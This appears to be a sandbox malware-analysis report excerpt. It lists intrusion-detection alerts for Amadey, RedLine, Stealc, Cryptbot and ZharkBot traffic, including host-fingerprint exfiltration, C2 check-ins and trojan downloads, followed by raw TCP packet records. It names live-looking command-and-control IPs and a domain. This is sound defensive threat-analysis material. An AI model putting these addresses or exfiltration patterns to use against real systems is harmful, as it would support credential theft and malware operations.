                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749758185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749766185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749749185.215.113.11780TCP
                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749730185.215.113.4380TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749777194.116.215.19580TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749802185.215.113.2680TCP
                                                      2024-09-24T15:33:38.681360+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749825185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749852185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749855185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749746185.215.113.11780TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749837185.215.113.11780TCP
                                                      2024-09-24T15:33:38.681360+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749819185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749716185.215.113.10380TCP
                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749719185.215.113.4380TCP
                                                      2024-09-24T15:33:38.681360+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749717185.215.113.4380TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749795194.116.215.19580TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749807185.215.113.2680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749867185.215.113.1680TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749715185.215.113.10380TCP
                                                      2024-09-24T15:33:38.681360+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749789194.116.215.19580TCP
                                                      2024-09-24T15:33:38.681360+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749762185.215.113.1680TCP
                                                      2024-09-24T15:34:11.084631+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749710185.215.113.10380TCP
                                                      2024-09-24T15:34:15.276869+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.749709TCP
                                                      2024-09-24T15:34:15.985131+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749711185.215.113.4380TCP
                                                      2024-09-24T15:34:19.845277+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749713185.215.113.4380TCP
                                                      2024-09-24T15:34:30.815003+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749718185.215.113.10380TCP
                                                      2024-09-24T15:34:40.905391+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749723185.215.113.1680TCP
                                                      2024-09-24T15:34:52.607276+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.749744185.215.113.1680TCP
                                                      2024-09-24T15:35:03.919633+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749754185.215.113.11780TCP
                                                      2024-09-24T15:35:05.458550+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.1680192.168.2.749744TCP
                                                      2024-09-24T15:35:31.260514+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749793185.215.113.3780TCP
                                                      2024-09-24T15:35:37.136350+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749801185.215.113.1680TCP
                                                      2024-09-24T15:35:53.657234+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:35:53.657234+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:35:53.840810+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response195.179.250.4526212192.168.2.749821TCP
                                                      2024-09-24T15:35:58.931250+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:35:59.393216+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:35:59.398088+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)195.179.250.4526212192.168.2.749821TCP
                                                      2024-09-24T15:36:00.402391+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:00.769945+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:00.958179+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:01.143360+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:03.003178+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749828185.215.113.3780TCP
                                                      2024-09-24T15:36:03.055540+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:03.548521+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:03.887840+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:04.136546+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749830185.215.113.1680TCP
                                                      2024-09-24T15:36:04.166587+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:04.350692+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:04.408707+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749830185.215.113.1680TCP
                                                      2024-09-24T15:36:04.659811+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:04.664950+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:06.491422+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:06.677334+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:07.048605+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:07.738255+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:08.064694+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:08.249381+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:08.438020+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:08.624201+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:08.823942+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:09.753404+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74982195.179.250.4526212TCP
                                                      2024-09-24T15:36:12.610790+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749836185.215.113.1680TCP
                                                      2024-09-24T15:36:15.278770+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749840185.215.113.3780TCP
                                                      2024-09-24T15:36:19.023473+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749842185.215.113.11780TCP
                                                      2024-09-24T15:36:43.819130+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749866185.215.113.1680TCP
                                                      2024-09-24T15:36:55.507285+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749875185.215.113.1680TCP
                                                      2024-09-24T15:37:01.566139+02002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.749879185.215.113.1680TCP
                                                      2024-09-24T15:37:02.723115+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749880185.215.113.1680TCP
                                                      2024-09-24T15:37:04.809122+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749882185.215.113.1680TCP
                                                      2024-09-24T15:37:05.586889+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749883185.215.113.1680TCP
                                                      2024-09-24T15:37:05.586889+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.749883185.215.113.1680TCP
                                                      2024-09-24T15:37:07.748435+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7507471.1.1.153UDP
                                                      2024-09-24T15:37:07.964770+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749887185.215.113.1680TCP
                                                      2024-09-24T15:37:08.692181+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749889185.215.113.1680TCP
                                                      2024-09-24T15:37:11.449923+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749892185.215.113.1680TCP
                                                      2024-09-24T15:37:12.153269+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749894185.215.113.11780TCP
                                                      2024-09-24T15:37:13.015059+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7633851.1.1.153UDP
                                                      2024-09-24T15:37:14.453708+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749897185.215.113.1680TCP
                                                      2024-09-24T15:37:15.107885+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:15.107885+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:15.169633+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749899185.215.113.10080TCP
                                                      2024-09-24T15:37:15.285680+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response189.105.223.19629862192.168.2.749898TCP
                                                      2024-09-24T15:37:18.351817+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749902185.215.113.1680TCP
                                                      2024-09-24T15:37:19.102576+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749903185.215.113.11780TCP
                                                      2024-09-24T15:37:20.355088+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:20.579088+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749904185.215.113.3780TCP
                                                      2024-09-24T15:37:20.811134+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:20.816167+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)189.105.223.19629862192.168.2.749898TCP
                                                      2024-09-24T15:37:20.991019+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:21.180394+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:21.368771+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:21.549360+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:21.697865+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749907185.215.113.1680TCP
                                                      2024-09-24T15:37:21.763966+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:22.077872+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:22.257888+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:22.357190+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749908147.45.44.10480TCP
                                                      2024-09-24T15:37:23.868092+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7552791.1.1.153UDP
                                                      2024-09-24T15:37:24.314182+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:24.557310+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:24.735328+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:24.962931+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:25.140645+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:25.434684+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:25.641795+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:26.029664+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:26.034927+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:26.824404+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:27.101950+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:27.356722+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:27.534468+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:27.747274+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74989889.105.223.19629862TCP
                                                      2024-09-24T15:37:33.283973+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749913185.215.113.1680TCP
                                                      2024-09-24T15:37:34.504959+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749914185.215.113.3780TCP
                                                      2024-09-24T15:37:34.593397+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7613941.1.1.153UDP
                                                      2024-09-24T15:37:34.841271+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749915103.130.147.21180TCP
                                                      2024-09-24T15:37:34.841271+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.749915103.130.147.21180TCP
                                                      2024-09-24T15:37:42.616081+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749920185.215.113.1680TCP
                                                      2024-09-24T15:37:43.325000+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749921185.215.113.1680TCP
                                                      2024-09-24T15:37:45.470645+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7539271.1.1.153UDP
                                                      2024-09-24T15:37:45.850872+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.749923185.215.113.1680TCP
                                                      2024-09-24T15:37:46.559368+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:46.559368+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:46.777675+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.215.113.6715206192.168.2.749924TCP
                                                      2024-09-24T15:37:46.932327+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74992546.19.218.204443TCP
                                                      2024-09-24T15:37:50.839638+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749927185.215.113.3780TCP
                                                      2024-09-24T15:37:51.769177+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.749929185.244.181.14080TCP
                                                      2024-09-24T15:37:53.389418+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:54.012342+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.215.113.6715206192.168.2.749924TCP
                                                      2024-09-24T15:37:54.174066+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:54.447557+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:54.794379+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:55.089779+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:55.296257+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.749932185.244.181.14080TCP
                                                      2024-09-24T15:37:55.320667+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:55.543913+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:56.439169+02002054416ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)1192.168.2.7640651.1.1.153UDP
                                                      2024-09-24T15:37:56.733238+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:56.954731+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:57.176073+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:57.689197+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:57.694532+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:58.725984+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP
                                                      2024-09-24T15:37:59.059504+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.749924185.215.113.6715206TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 24, 2024 15:34:04.863907099 CEST4970680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:04.868747950 CEST8049706185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:04.868818998 CEST4970680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:04.873795033 CEST8049706185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:04.873843908 CEST4970680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:04.878874063 CEST4970680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:04.879266977 CEST4970680192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:04.883960009 CEST8049706185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:04.884310007 CEST8049706185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:06.385920048 CEST4970780192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:06.397615910 CEST8049707185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:06.397706985 CEST4970780192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:06.397870064 CEST4970780192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:06.407357931 CEST8049707185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:06.407953024 CEST8049707185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:08.073645115 CEST4970880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:08.078690052 CEST8049708185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:08.078794956 CEST4970880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:08.079046011 CEST4970880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:08.084017992 CEST8049708185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:08.084084988 CEST4970880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:08.084130049 CEST4970880192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:08.084300041 CEST8049708185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:08.089052916 CEST8049708185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:08.089202881 CEST8049708185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:09.590632915 CEST4970980192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:09.595853090 CEST8049709185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:09.595946074 CEST4970980192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:09.596081018 CEST4970980192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:09.602082014 CEST8049709185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:10.358345032 CEST8049709185.215.113.43192.168.2.7
                                                      Sep 24, 2024 15:34:10.358423948 CEST4970980192.168.2.7185.215.113.43
                                                      Sep 24, 2024 15:34:10.363059044 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:10.369153023 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:10.369237900 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:10.369381905 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:10.375072956 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084472895 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084500074 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084515095 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084630966 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.084731102 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084762096 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084780931 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084799051 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.084804058 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.084837914 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.084863901 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.086189032 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.086210966 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.086227894 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.086260080 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.086272955 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.098855972 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.098977089 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.099826097 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.099896908 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.206708908 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.206762075 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.206798077 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.206835032 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.206868887 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.207066059 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.207118034 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.207124949 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.207151890 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.207176924 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.207211971 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.207529068 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.207564116 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.207593918 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.207626104 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.208059072 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.208092928 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.208112955 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.208128929 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.208137989 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.208175898 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.208224058 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.208273888 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.209007978 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.209060907 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.209291935 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.209326982 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.209361076 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.209399939 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.209786892 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.209930897 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.210350990 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.210386038 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.210406065 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.210427046 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.210881948 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.210916996 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.210942030 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.210953951 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.211045980 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.211098909 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.317363024 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.317519903 CEST4971080192.168.2.7185.215.113.103
                                                      Sep 24, 2024 15:34:11.321141005 CEST8049710185.215.113.103192.168.2.7
                                                      Sep 24, 2024 15:34:11.321207047 CEST4971080192.168.2.7185.215.113.103
